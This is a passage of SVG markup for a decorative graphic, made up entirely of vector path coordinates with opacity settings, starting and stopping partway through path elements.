d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 